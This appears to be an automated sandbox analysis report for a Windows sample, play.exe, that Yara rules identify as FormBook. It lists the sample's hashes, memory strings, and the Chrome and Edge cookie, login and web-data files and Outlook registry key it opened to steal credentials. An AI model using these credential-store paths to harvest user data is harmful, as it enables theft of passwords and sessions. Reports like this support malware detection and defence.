Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE86AF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00BE86AF

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

ID:	1502191
Product:	CloudBasic
Start time:	14:02:07
Start date:	31.08.2024
Sample:	play.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	22b582f31bd1c3a4345df16db968b74c
SHA1:	0756ad4a5bb0afefb30e7fc0e581203b52ab515d
SHA256:	9c1aee7c67abdbfcafee208e0a64ab065cd336d550f1cd66fe91679e9253903a
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
play.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report play.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
play.exe

Malware Threat Intel
Provided by